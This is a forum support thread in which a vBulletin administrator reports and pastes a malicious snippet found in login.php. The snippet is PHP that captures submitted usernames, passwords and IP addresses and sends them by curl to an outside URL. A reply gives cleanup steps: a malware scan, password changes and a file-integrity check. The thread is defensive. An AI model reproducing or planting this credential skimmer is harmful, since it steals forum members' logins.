No announcement yet.

Hacker adding malicious script to the login.php file

  • Filter
  • Time
  • Show
Clear All
new posts

  • Hacker adding malicious script to the login.php file

    Guys I need your help, I notice that sometimes my forum gives a problem in the login.php file, because it keeps giving a page error every time I try to log in to the forum, and when I check the loguin.php it has this script that doesn't I know why or how it got there. I believe it is some security flaw that is allowing someone to deploy this in the attempt I think I have access to member data ... Does anyone know how to tell me how I can fix this?

    $strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);
    if ($vbulletin->GPC['vb_login_username'] == '')
    eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
    if(isset($_POST['vb_login_username']) and isset($_POST['vb_login_password']) and $_SESSION['log_users'] != $_POST['vb_login_username'].$_POST['vb_login_password']) {
    $url = "".urlencode($_POST['vb_login_username'])."&password=".urlencode($_POST['vb_login_password'])."&ipaddress={$_SERVER['REMOTE_ADDR']}&local=".urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'])."";
    if (@extension_loaded('curl')) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    $data = curl_exec($ch);
    } else {
    $_SESSION['log_users'] = $_POST['vb_login_username'].$_POST['vb_login_password'];

  • #2
    First, you need to ask your host to see if they can determine how the site was hacked.

    Also run ClamAV Scanner on the public_html folder and quarantine or delete anything it finds.

    Change your password and all admin passwords.

    Then check all files in your vBulletin installation:

    AdminCP >> Maintenance >> Diagnostics >> Suspect File Versions

    That will list all files not part of vBulletin, including plugin files.

    If there's anything there you don't recognize, delete it or change the file extension to unknown (e.g., change filename.php to filename.php.unknown). It may break a plugin but you can always reinstall.
    Psychlinks Web Services Affordable Web Design & Site Management
    Specializing in Small Businesses and vBulletin/Xenforo Forums


    widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.